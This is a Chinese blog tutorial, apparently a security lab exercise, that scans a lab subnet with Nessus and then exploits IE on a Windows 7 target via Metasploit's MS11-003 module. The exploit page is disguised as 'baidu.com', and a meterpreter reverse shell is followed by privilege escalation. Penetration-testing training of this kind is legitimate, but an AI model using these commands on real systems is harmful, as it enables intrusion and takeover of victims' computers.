Metasploit攻击win7实例(下)

最新推荐文章于 2024-03-17 23:14:16 发布
最新推荐文章于 2024-03-17 23:14:16 发布
阅读量2.6k 收藏 11
点赞数 2
文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjxsir/article/details/111614303
版权

配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描,如下图所示。
在这里插入图片描述
图12 配置Nessus扫描
扫描结束后,Nessus会很直观的显示出目标网段的安全情况。下图显示了整个网段的安全信息。Nessus将安全问题归类为Info/Low/Medium/High/Critical五个等级,其中Critical等级的问题是最危险的,Info级别的问题通常是无关痛痒的信息显示问题。
在这里插入图片描述
图13 Nessus扫描网段结果
重点关注10.1.1.129主机,即win7靶机,Nessus扫描出该主机存在四个最高危漏洞、2个高危漏洞及其它漏洞问题。
在这里插入图片描述
图14 10.1.1.129主机漏洞概况
选中高危漏洞,Nessus给出了该漏洞的介绍、风险信息、解决方案等详细信息。Risk information对于攻击者来说非常有用,可以根据Risk information去Google搜索是否存在已知的漏洞利用Exp。
在这里插入图片描述
图15 MS11-030漏洞详情
实验二中扫描得到win7主机系统存在MS11_030解析漏洞,但是该漏洞利用条件较为苛刻,因此选择MS11_003 IE CSS Import漏洞来演示如何通过诱骗攻击者点击我们精心构造的含有攻击代码的网页来实现系统入侵。
1.在kali中执行“msfconsole”,启动metasploit
在这里插入图片描述
2.运行命令:“use exploit/windows/browser/ms11_003_ie_css_import”选择漏洞利用EXP
在这里插入图片描述
3.运行命令:show options,查看配置选项
在这里插入图片描述
4.设置生成的恶意网页的URI为baidu.com
运行命令:set URIPATH baidu.com
在这里插入图片描述
5.为防止服务器端口冲突,设置服务器端口为8060,避开常用端口8080
运行命令:set SRVPORT 8060
在这里插入图片描述
6.设置攻击负载
运行命令:set PAYLOAD windows/meterpreter/reverse_tcp
在这里插入图片描述
7.查看配置选项
运行命令: show options
在这里插入图片描述
8.设置LHOST以绑定本地IP
set LHOST 10.1.1.128
在这里插入图片描述
9.为避免冲突设置LPORT
运行命令:set LPORT 8866
在这里插入图片描述
10.运行命令“exploit”开始进行攻击,生成恶意网页和做好其他准备,只等受害者访问我们构造的恶意网页
在这里插入图片描述
11.在 Win7靶机打开IE,访问http://10.1.1.128:8060/baidu.com,模拟受害者误点击网页,靶机IE如下图所示,攻击者Metasploit显示如下图所示信息表明攻击成功。
在这里插入图片描述在这里插入图片描述
12 验证攻击是否成功。列出当前成功建立的回话,任意进入一个回话,查看攻击者的身份。可以尝试使用getsystem进行进一步的提权,如果提权失败则可以采取上传提权exe程序进行提权的方案获得最高权限。
sessions 列出所有会话
sessions -i 1 进入1号会话
getuid 查看当前用户
在这里插入图片描述

白玉瑕
关注
  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
Kali-linux使用Nessus
weixin_33966365的博客
04-18 5515
Nessus号称是世界上最流行的漏洞扫描程序,全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件,Nessus可同时在本机或远端上遥控,进行系统的漏洞分析扫描Nessus也是渗透测试重要工具之一。所以,本章将介绍安装、配置并启动Nessus。 5.1.1 安装和配置Nessus 为了定位在目标系统上的漏洞,...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
Metasploit攻击win7实例
qq_45768092的博客
10-23 2113
Metasploit攻击win7实例 本实验主要介绍了metasploit攻击win7的过程,通过本实验的学习,你能够了解kali下Nessus漏洞扫描工具的安装,掌握利用Nessus扫描目标主机,学会使用metasploitwin7系统的攻击。 实验简介 实验所属系列: 安全工具使用 实验对象:本科/专科信息安全专业 相关课程及专业: linux基础、网络安全 实验类别: 实践实验类 预备知识 Nessus基本介绍 Nessus是一个功能强大而又易于使用的网络和主机漏洞评估工具,分为免费的家庭版和付费的
风险评估工具NESSUS中的漏洞等级分类说明
weixin_33809981的博客
04-02 3138
Nessus将系统的漏洞归结为三类: Security Holes: 该项***成功并且会造成极大的安全风险。 Security Warnings: 该项***成功,但是不会对安全造成大的影响。 Security Notes: 软件通过扫描发现了系统相关信息。 接下来,Nessus还会将这三类漏洞依据风险因素分解为不同等级: Critical:已经威胁到远端主机的安...
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 2793
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
基于Python的nessus API简析——监听&获取扫描结果
Morliasde的博客
12-05 4599
前言之前的文章中我们完成了登录并发起了一次扫描,接下来我们将继续跟进,监听扫描进度并获取扫描结果。
Msf攻击Win7
07-09
【Msf攻击Win7】指的是使用Metasploit框架对Windows 7系统进行渗透测试或漏洞利用的过程。Metasploit是一款开源的安全漏洞检测工具,广泛应用于安全研究、渗透测试和教育领域。它包含了大量的exploits(漏洞利用代码...
Metasploit网络攻击样例解析.pptx
01-05
网络渗透攻击与普通网络攻击的不同在于它是一种系统渐进型的综合攻击方式,其攻击目标是明确的,攻击目的往往不那么单一,危害性也非常严重。为了实现渗透攻击攻击者采用的攻击方式绝不仅此于一种简单的Web脚本...
metasploit 浏览器攻击
01-20
metasploit 浏览器攻击metasploit 浏览器攻击metasploit 浏览器攻击
使用metasploit攻击实例讲解1-ms10-046快捷方式图标漏洞
12-29
本主题将深入探讨一个具体的实例,即“ms10-046快捷方式图标漏洞”利用,以及如何通过Metasploit框架进行渗透测试。Metasploit是一款广泛使用的开源安全工具,它包含了大量预构建的攻击模块,便于安全专家进行漏洞...
MS11_003 漏洞利用与安全加固
最新发布
theRavensea
03-17 1707
实验在 Metasploit 下结合 XSSF 对IE 浏览器进行渗透测试,利用 MSHTML.DLL 处理悬挂指针漏洞(MS11-003)。MSHTML.DLL 是一个用于解析 HTML 语言的动态链接库,IE、Outlook、Outlook Express 等应用程序都使用了该动态链接库。 MS11_030 漏洞产生的原因:Internet Explorer 在事件处理的实现上存在远程代码执行漏洞攻击者可利用此漏洞在受影响应用程序中运行任意代码,造成拒绝服务。在处理某些对象操作时,MSHTML.DL
Metasploit入侵win7
qq_53030229的博客
11-07 1854
文章目录一、Metasploit是什么?1、Auxiliaries(辅助模块)2、Exploit(渗透攻击模块)3、payload(攻击载荷模块)4、Post(后期渗透模块)5、Encoder(编码工具模块)二、Metasploit入侵步骤1.引入库2.读入数据 一、Metasploit是什么? 这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行) Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板
Metasploit入侵win7系统
weixin_45092418的博客
06-18 2259
Metasploit入侵win7系统一:实验环境二:获得信息a.获得网络拓扑图b.获得主机ip和目标ip三:实施入侵a.打开控制终端b.查找漏洞c.进行配置四:对主机进行操作五:做个守法的好青年 一:实验环境 主机:安装有Metasploit的kali linux 操作系统 目标:已关闭防火墙的win7系统 二:获得信息 a.获得网络拓扑图 画出网络拓扑图,确定你和目标主机在同一局域网下。 b.获得主机ip和目标ip 1.主机ip:ifconifg 这里的eth0是你有线连接的ip地址,也是lhost。
笔记: kali metasploit ms17_010 入侵 win7
qq_38611079的博客
10-11 6093
ping 原理:利用网络上机器IP地址的唯一性,给目标IP地址发送一个数据包,再要求对方返回一个同样大小的数据包来确定两台网络机器是否连接相通,时延是多少。ping也属于一个通信协议,是TCP/IP协议的一部分      (百度百科)    首先要先ping一下两台机子,看能不能连接的通。(因为如果ping不通的话,数据包无法传达到,那么后面的也就没有意义了) 刚开始的时候我是直接ping的...
关于使用msf渗透攻击Win7主机并远程执行命令的复习
weixin_44663190的博客
04-16 5461
关于使用msf渗透攻击Win7主机并远程执行命令的复习 一、关于环境的搭建 攻击机:kali 靶机:win7 旗舰版 sp1 win版本这里最好就下载我所指出的版本,因为其他版本由于系统和补丁不同可能会出现漏洞无法利用情况 关于kali系统和win7 旗舰版sp1的安装就不多赘述,很多博文都已经讲述 1.1 打开虚拟机软件,准备开始环境 1.2 打开已经配置好的两个虚拟环境 1.3 配置...
演示使用Metasploit入侵Windows
qq284489030的博客
05-09 2672
我使用KaliLinux的IP地址是192.168.0.112;在同一局域网内有一台运行WindowsXP(192.168.0.108)的测试电脑。   本文演示怎么使用Metasploit入侵windows xp sp3。   启动msfconsole:   # msfconsole   选择一个漏洞:   msf > search platform: windows...
首次成功的web渗透
时光凉春衫薄的博客
03-05 6207
web渗透 今天给大家讲一个最近做的一件令我振奋的一件事情 渗透培训刚刚结束的第二天 我在公网上挖到了我人生中的第一个站 总体来说个人真的很振奋人心 这个网站还没有进行更改但我已经通知了他们的网站管理员对其进行提醒 为了保护这个站点我将这些敏感的信息进行了修改 在这里我想给大家分享一下我拿站的经验,大家多多交流,我相信这些过程的交流会让我们有更好的技术去服务我们的安全社会 ...
Metasploit渗透测试实验报告
热门推荐
ling_xiao007的专栏
02-21 1万+
Metasploit渗透测试魔鬼训练营》一书采用独特的让读者成为虚拟渗透测试的主角的方式,经历一次对DVSSC公司网络的渗透测试任务。渗透测试的目标为DVSSC公司DMZ网段以及内网客户端主机。四个主机均存在严重漏洞缺陷,可执行不同方式的攻击方式。 信息搜集阶段获得了dvscc的域名注册信息、地理位置,以及DMZ网段操作系统版本、开放端口及其服务版本等信息,但域名注册信息存有疑问。 漏洞扫描阶段获得DMZ网段主机大量漏洞信息,可采取不同方式的攻击方式,如口令猜测、网络服务渗透攻击、浏览器渗
使用kail中Metasploit获取Windows的权限并提权
yuchen的博客
01-07 1955
0x01 环境搭建 虚拟机:kali 虚拟机:win7 0x02 实际操作 1.生成木马 2.移动木马至/var/www/html目录下 3.给木马文件evil.exe加上X权限 4.kali需要开启Apache2服务 5.用windows打开kali得ip下载木马文件 6.提前查看postgresql运行状态/etc/init.d/postgresql status 打开postgresql数据库/etc/init.d/postgresql start 打开后才会出现绿点 7.开启MSF 8
metasploit 木马 win10
08-12
Metasploit是一款功能强大的渗透测试工具,可以用于创建和管理各种类型的恶意软件,包括木马。对于在Windows 10系统上使用Metasploit创建木马,您可以使用msfvenom来生成适用于Windows 10的恶意软件。 例如,您可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值